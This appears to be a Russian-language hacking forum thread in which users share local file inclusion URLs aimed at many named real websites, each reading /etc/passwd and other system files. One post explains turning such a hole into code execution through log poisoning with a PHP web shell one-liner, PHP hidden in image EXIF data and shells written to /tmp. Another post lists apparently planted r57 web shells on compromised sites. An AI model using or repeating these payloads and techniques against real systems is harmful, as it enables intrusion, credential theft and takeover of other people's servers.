Code: http://www.sodepau.org/cat/index.php?id=../../../../../etc/passwd http://www.sodepau.org/cat/index.php?id=../../../../../etc/hosts http://www.sodepau.org/cat/index.php?id=../../../../../etc/services http://www.sodepau.org/cat/index.php?id=../../../../../etc/group http://www.sodepau.org/cat/index.php?id=../../../../../etc/profile
Локальный инклудинг Code: http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/passwd http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/ftpusers http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/hosts http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/group http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/services http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/profile я ничего не смог там сделать(
тож локалка Code: http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd Обьясните мне плз в чем смысл находить etc/passwd?
WindowS =) Ru ps: обычно смысл в том,что в passwd пути к папкам юзеров. также можн опопробовать связки логин пароль на фтп,БД и т.д. )
Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение... например есть локальный инклюд, ты можешь: 1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно) 2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>) 3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку) 4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp 5) куча вариантов, насколько фантазии хватит Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде) ну надеюсь ты понял...
Windows NT DS-31077-1 5.2 build 3790 http://nyec.modernsignal.net/content/documents/document2.php ----- http://www.ncti-india.com/ncti-archive/txtfiles/roki.php http://sayko-esrarci.com/r57.php http://milfmuncher.net/dump.php http://www.karizmatikshow.com/zzz.php http://pp.dhbl.org/phpshell/r57.php http://myauction.us/banners/r57shel.jpg.pdf.swf.php http://www.wshakespeare.net/images/r57shell.htm
Free space : 1665.75 GB Total space: 3209.17 GB этот shell.php сразу в глаза бросилса...ну и названьице))
Code: http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/passwd http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/hosts http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/group http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/services http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/profile http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/syslog.conf Code: http://www.iswizards.com/index.php?PAGE=../../../../etc/passwd http://www.iswizards.com/index.php?PAGE=../../../../etc/hosts http://www.iswizards.com/index.php?PAGE=../../../../etc/group http://www.iswizards.com/index.php?PAGE=../../../../etc/services http://www.iswizards.com/index.php?PAGE=../../../../etc/profile http://www.iswizards.com/index.php?PAGE=../../../../etc/syslog.conf Code: http://www.whototake.com/index.php?page=../../../../../etc/passwd http://www.whototake.com/index.php?page=../../../../../etc/hosts http://www.whototake.com/index.php?page=../../../../../etc/group http://www.whototake.com/index.php?page=../../../../../etc/services http://www.whototake.com/index.php?page=../../../../../etc/profile http://www.whototake.com/index.php?page=../../../../../etc/syslog.conf Code: http://deine-lernlinks.de/index.php?page=../../../../../etc/passwd http://deine-lernlinks.de/index.php?page=../../../../../etc/hosts http://deine-lernlinks.de/index.php?page=../../../../../etc/group http://deine-lernlinks.de/index.php?page=../../../../../etc/services Code: http://www.aiongenesis.com/index.php?page=../../../../../etc/passwd http://www.aiongenesis.com/index.php?page=../../../../../etc/hosts http://www.aiongenesis.com/index.php?page=../../../../../etc/group http://www.aiongenesis.com/index.php?page=../../../../../etc/services http://www.aiongenesis.com/index.php?page=../../../../../etc/profile http://www.aiongenesis.com/index.php?page=../../../../../etc/syslog.conf Code: http://www.sodepau.org/cat/index.php?id=../../../../../../etc/passwd http://www.sodepau.org/cat/index.php?id=../../../../../../etc/hosts http://www.sodepau.org/cat/index.php?id=../../../../../../etc/group http://www.sodepau.org/cat/index.php?id=../../../../../../etc/services http://www.sodepau.org/cat/index.php?id=../../../../../../etc/profile http://www.sodepau.org/cat/index.php?id=../../../../../../etc/syslog.conf Code: http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/passwd http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/hosts http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/group http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/services http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/profile Code: http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/passwd http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/hosts http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/group http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/services http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/profile Code: http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/passwd http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/hosts http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/group http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/services http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/profile http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/syslog.conf Code: http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/passwd http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/hosts http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/group http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/services http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/profile Code: http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/passwd http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/hosts http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/group http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/services http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/profile http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/syslog.conf
php-ru.info Code: http://php-ru.info/index.php?dn=html&path=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q= Гыгыы, а пишут еще "Проверенные скрипты и сервисы" UPD: Я сейчас посмотрел и понял, что такая бага присутствует в моде "парсер html" (dn=html) к cms Danneo CMS, но думаю в уязвимости CMS постить не буду, кто хочет - запостите
http://ar.water.usgs.gov Code: http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/passwd http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/hosts http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/ftpusers http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/services http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/group http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/networks http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/profile http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/syslog.conf http://banshee.ru Code: http://banshee.ru/main.php?page=../../../../etc/passwd%00 http://banshee.ru/main.php?page=../../../../etc/hosts%00 http://banshee.ru/main.php?page=../../../../etc/services%00 http://banshee.ru/main.php?page=../../../../etc/group%00 http://banshee.ru/main.php?page=../../../../etc/profile%00 http://banshee.ru/main.php?page=../../../../etc/syslog.conf%00